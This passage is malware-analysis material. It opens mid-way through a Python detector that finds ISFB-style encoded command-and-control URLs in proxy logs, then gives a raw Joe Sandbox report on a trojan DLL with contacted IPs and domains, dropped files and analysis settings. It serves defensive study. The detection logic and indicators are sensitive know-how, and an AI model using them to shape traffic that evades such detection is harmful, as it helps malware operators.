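    """Scan whitespace-separated log fields for URLs whose path decodes as an
    ISFB-style blob; return (url, blob length in bytes) pairs."""
    hits: List[Tuple[str, int]] = []
    for line in log_text.splitlines():
        for field in line.split():
            if field.startswith(("http://", "https://")):
                blob = recover_blob(field, prefix)
                if blob is not None:
                    hits.append((field, len(blob)))
    return hits


# Constructed inputs (not from the report): a toy blob whose base64 form
# contains '+', '/' and '=' padding, and four proxy log lines, one of which
# carries the report URL and one a URL built from the toy blob.
SAMPLE_BLOB = b"\xff\xff\xff\xfb\xff\xbfhello"
CONSTRUCTED_LOG = "\n".join([
    "2021-10-20T15:09:01Z 192.168.2.5 GET https://aaaa.bar/ 200",
    "2021-10-20T15:09:02Z 192.168.2.5 GET " + REPORT_URL + " 200",
    "2021-10-20T15:09:03Z 192.168.2.5 GET "
    "https://btloader.com/tag?o=6208086025961472&upapi=true 200",
    "2021-10-20T15:09:04Z 192.168.2.5 GET " + encode_blob(SAMPLE_BLOB, seed=3) + " 200",
])

if __name__ == "__main__":
    for url, size in find_c2_urls(CONSTRUCTED_LOG):
        print(f"{size:4d}-byte blob  {url[:60]}...")
```

Run stand-alone, the scan reports two hits: the report URL and the constructed one, while the bare https://aaaa.bar/ and the btloader.com URL are passed over. The blob recovered from the report URL has a length that is a multiple of 16, consistent with the Serpent block size that ISFB analyses describe; the two partial memory strings in the table above do not decode, which is expected for truncated strings and is a useful negative check when triaging memory dumps.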

                                                              Contacted IPs


                                                              Public

IP              Domain                        Country        ASN    ASN Name         Malicious
104.26.3.70     ad-delivery.net               United States  13335  CLOUDFLARENETUS  false
31.220.111.98   aaaa.bar                      Lithuania      47583  AS-HOSTINGERLT   false
151.101.1.44    tls13.taboola.map.fastly.net  United States  54113  FASTLYUS         false
104.26.7.139    btloader.com                  United States  13335  CLOUDFLARENETUS  false
104.20.184.68   geolocation.onetrust.com      United States  13335  CLOUDFLARENETUS  false
172.217.168.38  dart.l.doubleclick.net        United States  15169  GOOGLEUS         false

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 506330
Start date: 20.10.2021
Start time: 15:07:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 18m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: gECym.bin (renamed file extension from bin to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDLL@26/19@24/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 64.6% (good quality ratio 60.8%)
• Quality average: 78.4%
• Quality standard deviation: 30.2%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
                                                              Warnings:
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.80.193, 131.253.33.203, 80.67.82.240, 80.67.82.209, 131.253.33.200, 13.107.22.200, 65.55.44.109, 23.211.4.86, 23.211.6.95, 204.79.197.203, 152.199.19.161, 20.82.210.154, 80.67.82.211, 80.67.82.235, 40.112.88.60, 20.82.209.183, 20.54.110.249, 40.91.112.76, 51.104.136.2
                                                              • Excluded domains from analysis (whitelisted): signin.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e11290.dspg.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, vote.microsoft.com, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, cs9.wpc.v0cdn.net, store-images.s-microsoft.com-c.edgekey.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, www-msn-com.a-0003.a-msedge.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                              • Report creation exceeded maximum time and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                              Simulations

                                                              Behavior and APIs

Time      Type             Description
15:10:37  API Interceptor  1x Sleep call for process: regsvr32.exe modified
15:10:37  API Interceptor  2x Sleep call for process: rundll32.exe modified
15:10:37  API Interceptor  1x Sleep call for process: loaddll32.exe modified
15:12:26  API Interceptor  46x Sleep call for process: powershell.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASN

                                                              No context

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3F2CDD13-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):5632
                                                              Entropy (8bit):2.303215435374284
                                                              Encrypted:false
                                                              SSDEEP:24:rBG//dyyoG//dyywjwyyaMJOyyqMJn9lW6rb9lW6r:rBG/8PG/8Nj7ncXV2i2
                                                              MD5:B56ACB4E6B3293BA19D0503E2170C408
                                                              SHA1:92DB88CC10DB2A603E8466D7B402C37D21A584C3
                                                              SHA-256:2449C11333E65E0D972FB3F5BC3A0667C6E8EEF0350663A1968C0B1ED02E679B
                                                              SHA-512:15CD996A299EA60B92DC0A5F5F9AC2924D8D61DD9173C2A821804C8C770268426228BD2455F17E9FEB051C7CC79EDD792F3421FB224E3AF0C3995A5F37B2EBBA
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................'...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.F.N.0.s.P.#.I.x.7.B.G.Q.5.e.z.0.u.1.c.N.y.Q.=.=.........:.......................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3F2CDD15-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):332800
                                                              Entropy (8bit):3.5961335597614354
                                                              Encrypted:false
                                                              SSDEEP:3072:3Z/2Bfcdmu5kgTzGtMZ/2Bfc+mu5kgTzGtYZ/2Bfcdmu5kgTzGtPZ/2Bfc+mu5kn:+3CA
                                                              MD5:E18515874802ADABB53A5FDA9129AA3B
                                                              SHA1:B5E4471C3B7585C26EB07ED9D1708F2D11419C26
                                                              SHA-256:C5C901014D0AD31761C34F248BCA359042DC32A56F18934B1681A8A5F08D3325
                                                              SHA-512:1B16A003EC2FABA88B9E0383B4B1F43586DB475A1CA88E0EC2F84ECE719A7A5779F75696C3416794FB2D8CB8302BD4EC62ED28EB8B3E437C03002C517F1472F3
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>...........................................................G...H...I...J...............................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0..6..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{497FFA3A-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):4096
                                                              Entropy (8bit):1.6705445729981827
                                                              Encrypted:false
                                                              SSDEEP:12:rl0oXGFxT4XDrEgm8Gr76Fr+lXDrEgm8GD7qw9lpQA9dv9lsQ0Y9cC:rtG8r+lTG8C9laAH9lr0Y2
                                                              MD5:B22965349F002388D86C795AFD60EB6A
                                                              SHA1:68AA871597398E51A33ABF8C402C8D54C484AFCB
                                                              SHA-256:EBFFCD86C7D5468E4021389A5A72B51178AE653892BDFF78B2799D4205612DE7
                                                              SHA-512:C62ADFADA8DA38E0DB68AE58E5401FCEFB001B14CF098AA3AF04B56CBCEC8B43E4E5A7324FDB14BA5854DA72B8723856B8BFF0B2DE64C555363E4279B69FCF7F
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................psr3..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{800CAE1D-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):4096
                                                              Entropy (8bit):1.6657795438851608
                                                              Encrypted:false
                                                              SSDEEP:12:rl0oXGFvXDrEgm8Gr76FA+lXDrEgm8GD7qw9lpQA9dv9lsQ0Y9cC:rYG8A+lTG8C9laAH9lr0Y2
                                                              MD5:7B33FEEE0D101255C74A14617B867714
                                                              SHA1:EC8CF0E9F78A22A2D07A567D947A842C22B593E0
                                                              SHA-256:DCC08AA984FBC0153588DA4FC94DA31B710DCAFD83745FBD42B920CC30F46110
                                                              SHA-512:FD8CC23EBDF673D3478AD7AA71A85586EF7E413846A715BF96EEEC762D68C7410EB358818711C83B76D1DF8863A46640EAF4ABC1CA67845B725CE1A99EF7404A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................~..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D1D55D3D-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):3584
                                                              Entropy (8bit):1.5617078821522077
                                                              Encrypted:false
                                                              SSDEEP:12:rlxAF6cDrEgm8GD7KFsr+lXDrEgm8GD7qw9lpQA9dI:ryG80r+lTG8C9laAg
                                                              MD5:7D83E65B1A457E107649B777321DD535
                                                              SHA1:0910FEDDE1889D1FB167F3877BFEDB2C89B371FF
                                                              SHA-256:76E6CFBA96B530161AA5C22CC0BA98AE299A3E3AAEDDD693DF71F6671BA757BD
                                                              SHA-512:696D0340BFBA24A714949F68382605708EC1C32B893E2768C942FE29154059D39033FD7D83EF3AE9A4E9AF4371E13AC23E0948EC9262828D6F5C6DDA1D7B0C89
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................5...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):356
                                                              Entropy (8bit):5.09283390816657
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc41EH8tPCTD90/QL3WIZK0QhPPFVDHkEtMjwu:TMHdNMNxOEHCPCnWimI00ONVbkEtMb
                                                              MD5:62E15860B582D37CA3DC1E8D89A26808
                                                              SHA1:A3CA8F879F027A187BAED3808170D6DC9BB869AB
                                                              SHA-256:88E4A132068204BC44F931CCA5AD81C3A1C24D9EAB5C1A76FE491C8FC15462F3
                                                              SHA-512:AC7BCEF376AE0F612E9B9EE6AA7FF7BD3C72B18E404160E531B73DB25AE7C52427BCC45DC4CE285ACDDCDD03CA9F0F9A714B0A13A44DE5884FD9B2F82E7D1B17
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2c5acf47,0x01d7c5ff</date><accdate>0x2de0356b,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):354
                                                              Entropy (8bit):5.154761999497282
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkCQm5xupnPCTD90/QL3WIZK0QhPPFkI5kU5EtMjwu:TMHdNMNxe2kY5xu1PCnWimI00ONkak6t
                                                              MD5:0B75967CE7823399CC9E68BFB39555AB
                                                              SHA1:091F7FD13C40120E60A7DB5EF077C57FE360A7A4
                                                              SHA-256:E063C3FB1FAC640CC3A5D45DC8B1C4118D9E49F038353D08E3007895D01B2C66
                                                              SHA-512:90AA3E8082FCED94D90E5EF2EC85FA5A1A7D34BE809FCEEA0BC537C57B8A7007D37783E910A6A06B02D30CF7C099EBD0A89D7A29CBF2A008AC60D05A96A916D0
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x282eb4dc,0x01d7c5ff</date><accdate>0x29494c51,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):360
                                                              Entropy (8bit):5.115695135561688
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4GLxHcO7IG+X3PCTD90/QL3WIZK0QhPPFyhBcEEtMjwu:TMHdNMNxvLf7IG+nPCnWimI00ONmZEty
                                                              MD5:995D36FBF50B147C5BBB8631E1818BCB
                                                              SHA1:A717E139D22DADFDF5E3001311548D2B8162736B
                                                              SHA-256:1037C0DB52D760F85E31788A79938F98C02DAAA503EB1EF17428780DA5CF7A53
                                                              SHA-512:BCF4CF4E390276F2D2028515C9AC177F5DC06B1116676F21431CA96F442615E211EB3C8BC36A86F271F937F25B90911AD29088EEFBEC6212C61FE80D0E00A2EF
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x2dfeb9f7,0x01d7c5ff</date><accdate>0x2e974fc7,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):350
                                                              Entropy (8bit):5.103042002751772
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4Jfh8xPCTD90/QL3WIZK0QhPPFgE5EtMjwu:TMHdNMNxi58xPCnWimI00ONd5EtMb
                                                              MD5:1D0E1196E21C30784542EA183D95A74A
                                                              SHA1:CE8404D40C89CAA6AADC3CBF0ABB29A289D1E1FE
                                                              SHA-256:38D4C1B1A09D82ACE7C8FA471101DCB9DD56C6F7DB175C3EFC8505312D651F66
                                                              SHA-512:C369214C76B5F5BD6D0A6C3215924D1104D47D9FAE590C5BE6DB97AE208CEADED5C7F458C749C7E3E7DEC50957F85E737B608C2FD6C9E80182AFF042B0DEE41E
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x29f123e3,0x01d7c5ff</date><accdate>0x2a0fa821,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):356
                                                              Entropy (8bit):5.129962863682922
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwjkl3GPCTD90/QL3WIZK0QhPPF8K0QU5EtMjwu:TMHdNMNxhGwQl3GPCnWimI00ON8K075t
                                                              MD5:9EE7BB9F737A35DFED726C4336113B67
                                                              SHA1:AD66D3D924114AF6CCFBA356BE34F2F31363B218
                                                              SHA-256:E9840BF4F1450FC2AF52F31F730021228A7CB245A9618D2869C5C8AC3A9265D3
                                                              SHA-512:E140396C5BBDD8C96C0826DA5A79BD7E76118612485005F11ABBFEA4531159802B10B7D98A37AB166C629B2BD3DE30DF0A2F76C99D003AD12814C6C62A12F02F
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2f7c3137,0x01d7c5ff</date><accdate>0x2fa2086b,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):354
                                                              Entropy (8bit):5.097430067460448
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4Qun2Bpm+PCTD90/QL3WIZK0QhPPFAkEtMjwu:TMHdNMNx0nUpm+PCnWimI00ONxEtMb
                                                              MD5:A20F5AC3338194FC43A94D368F1C9BC4
                                                              SHA1:AB3F7F046C8BD7B4C9D859B489E1125AC0A1BF8E
                                                              SHA-256:E6ADD4201A8FA3A044175A4FBBCA41E37D77B534B4E6673B2E0750DC55A27567
                                                              SHA-512:CF7D7AA80F1E1BC5593AF427094F393F96EB82086EFE6D79437CFF5A319128789FB371C14E36A76062FCBC6E74A0E0611180B6B24015AC9408E1DFE4E7953331
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x2bff4231,0x01d7c5ff</date><accdate>0x2c3c4bad,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):356
                                                              Entropy (8bit):5.157487660473765
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTZE+dSVX3PCTD90/QL3WIZK0QhPPF6Kq5EtMjwu:TMHdNMNxxZE+ol3PCnWimI00ON6Kq5Es
                                                              MD5:9CC05798E2875E33DA3EDF0EC27114E7
                                                              SHA1:FCA636B9EE2F1ED2BE5CC432D7858B2A1F39448C
                                                              SHA-256:E49C4CC7CB305E47A167A3CF2903AC6ACFE07BB3B4A768C6E5CE7456382FB759
                                                              SHA-512:097E6FD828903745B87C0CABEF36F5B68416CD17AA5BE9A777BCACC3A8AA6951BCC234E42B3D6290FF87AFCB6C8A38A6DC73AD181DE0C479BAD4BFCFD151C6AE
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x2aa83e96,0x01d7c5ff</date><accdate>0x2bca2890,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):358
                                                              Entropy (8bit):5.13236679854782
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2nWisFVUB+PCTD90/QL3WIZK0QhPPF02CqEtMjwu:TMHdNMNxcWiC++PCnWimI00ONVEtMb
                                                              MD5:10F611B03BE4A108C81266AFDCD91385
                                                              SHA1:12FBE36DE82221E790A9A5D466BB2662571FF974
                                                              SHA-256:D0BCC8F1B999D1ECCD3ADBE429D4CE109D233FF0A713690067BC285BAC7ACAA1
                                                              SHA-512:0F05E1D796C0EC220F3A159ADAA979E5F7DC8CCA6751D115595DF405D50F9A8F037D9B309523C9FA1FC6BC2B72FC7C898E10918610FAD70B8A6FC1726EFAA5ED
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2977127a,0x01d7c5ff</date><accdate>0x298da916,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):354
                                                              Entropy (8bit):5.133907694283372
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4Inb17y3+GcPCTD90/QL3WIZK0QhPPFiwE5EtMjwu:TMHdNMNxfnZ23+5PCnWimI00ONe5EtMb
                                                              MD5:7C6EB178DBB04EBFC7E6B9C793025BC0
                                                              SHA1:326D228502753815F74904D961CF0C9734D9201A
                                                              SHA-256:D1273EDCD6D95D4D85DC4F1F090A939C59D9B88E01F6B5DB815506A180D4DE6A
                                                              SHA-512:01725A4426637D7770EBCB78CA365C13DAD5095B5D7BAB96F7CB93E4921BBD40CD7E82B6F9F864B50EC0435564CF584F4CAC20C8D7E3EA16C0E08081F06D6D13
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x29b46a73,0x01d7c5ff</date><accdate>0x29d29f72,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Temp\~DF062D96AA82264A2D.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.08578582712352636
                                                              Encrypted:false
                                                              SSDEEP:3:NUofhQ0SA/WU/lg/lclllv/nt+lybltll1lRslkhlEkll/aEhh4V7:fpQ/AecgUFAlkxHbh4V7
                                                              MD5:A290D9C564235C12A4957F7722B9C169
                                                              SHA1:DE05A28BE040AA95C2D8D6A6CC15780A22C98032
                                                              SHA-256:4763A26542D87F93254C9A1BE3DE157209CE44AEEE8225E2C45E8CC4C945E71B
                                                              SHA-512:DB37057AF3CFDDCBF6252D32D5C11D7134D3C90DEF8F4062A526B3C5B28A5AB31354EC4BE00381CE85D6D83CFAEFE49DCD2B6F59EBF930F1BE899CE497529781
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF1D0E3EB87BA124E4.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.06045461972774207
                                                              Encrypted:false
                                                              SSDEEP:3:alFXEAUolllfltE3lX9/Dl/Oly3lgHl0llftRslkhlEkllM+lylhllAlFJejl+lE:a/vllsngF0/AlkxFIBGKjEW1
                                                              MD5:9FFCF967410609EAB508F254E7CA6AA2
                                                              SHA1:061671A355104728137C16CDEC077B7312545F36
                                                              SHA-256:A3EC8754D1131E7E3F9E35A5EA52257B5CAE7686F3F4355DA048AC16F4A30E98
                                                              SHA-512:11D215E25AFE2EB70C54C54C6B4E3125382C842324889FFC15E1B9F0E333C04473E9A8EED6FBDA0C09478693811EF46EFE97A16D08209EF00496B98AFD6B6973
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF21F93D34852E97E1.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.06045461972774207
                                                              Encrypted:false
                                                              SSDEEP:3:alFXEAUolllfltE3lX9/Dl/Oly3lgHl0llftRslkhlEkllM+lylhllAlFJejl+lE:a/vllsngF0/AlkxFIBGKjEW1
                                                              MD5:9FFCF967410609EAB508F254E7CA6AA2
                                                              SHA1:061671A355104728137C16CDEC077B7312545F36
                                                              SHA-256:A3EC8754D1131E7E3F9E35A5EA52257B5CAE7686F3F4355DA048AC16F4A30E98
                                                              SHA-512:11D215E25AFE2EB70C54C54C6B4E3125382C842324889FFC15E1B9F0E333C04473E9A8EED6FBDA0C09478693811EF46EFE97A16D08209EF00496B98AFD6B6973
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
